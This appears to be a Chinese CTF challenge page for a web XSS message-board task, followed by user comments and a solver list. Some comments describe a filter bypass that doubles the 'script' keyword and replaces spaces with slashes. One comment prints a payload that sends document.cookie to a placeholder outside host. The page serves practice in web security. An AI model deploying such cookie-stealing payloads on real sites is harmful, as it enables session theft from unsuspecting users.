留言板1WEB 未解决

分数: 20 金币: 3
题目作者: harry
一  血: 18256197318
一血奖励: 5金币
解  决: 246
提  示: 需要xss平台接收flag
描  述:
flag{}
评论
网恋秀牛子被录屏导致自卑 9月前

我用的是xss.report,可以收到,payload很多,界面酷炫,点右边的爬虫图标就能看到详情,cookie里面有flag。 这题是script双写绕过,空格用斜杠代替

回复 0
十里故清云 7月前

用双写绕过和空格了,还是收不到啊...

回复 0

dlgz 1年前

公网上的xss平台没找到http的,自己搭了一个测试的成功了。

回复 0

Kr1smi1e 1年前

题目确实没问题,可以参考:https://blog.csdn.net/weixin_74357882/article/details/149303799?sharetype=blogdetail&sharerId=149303799&sharerefer=PC&sharesource=weixin_74357882&spm=1011.2480.3001.8118

回复 1

iNMB 1年前

垃圾题目,输入的js根本没有回显。使用浏览器看cookies发现flag,结果上传flag说我flag错误。

回复 1

llc123 1年前

根本收不到,还以为你加了什么限制,花5金币看你wp等于白看

回复 2

kl01 1年前

试了几个xss平台收不到 自己没服务器溜了溜了

回复 1

cwscc 1年前

xss平台接收不到信息,有问题

回复 0

Jesen 1年前

2025年3月17日最新验证,本题获取flag没有问题,请检查是不是之前的payload没有闭合从而影响了后续js代码的正常加载

回复 1

Rannnn 1年前

换了四个XSS平台和自己搭的flask应用,连请求都收不到啊!!!

回复 0

ipconfig2023 1年前

题目有问题,希望修复一下,换了几个平台都收不到cookie,在自己服务器上运行的flask应用,收不到来自题目服务器的请求<scsCRiPtript>location.href="http://xx:8081/?flag_cookie="+document.cookie</scsCRiPtript>

回复 0

WriteUp

image
小蔡

5 金币

评分(4)

解题动态

星宇Sec 攻破了该题 1天前
这个昵称已存在 攻破了该题 4天前
加州故事 攻破了该题 14天前
mystery 攻破了该题 14天前
灵梦归希 攻破了该题 23天前
ljjbit 攻破了该题 27天前
whshkdh 攻破了该题 29天前
tabwux 攻破了该题 1月前
兰小方 攻破了该题 1月前
任务renwu 攻破了该题 1月前
Star666 攻破了该题 1月前
小石 攻破了该题 1月前
风掠 攻破了该题 1月前
15325870583 攻破了该题 1月前
Vluae 攻破了该题 1月前
afeer123 攻破了该题 1月前
hdcc1 攻破了该题 1月前
zrlht 攻破了该题 1月前
wangjing6715 攻破了该题 1月前
18394165790 攻破了该题 2月前
问题反馈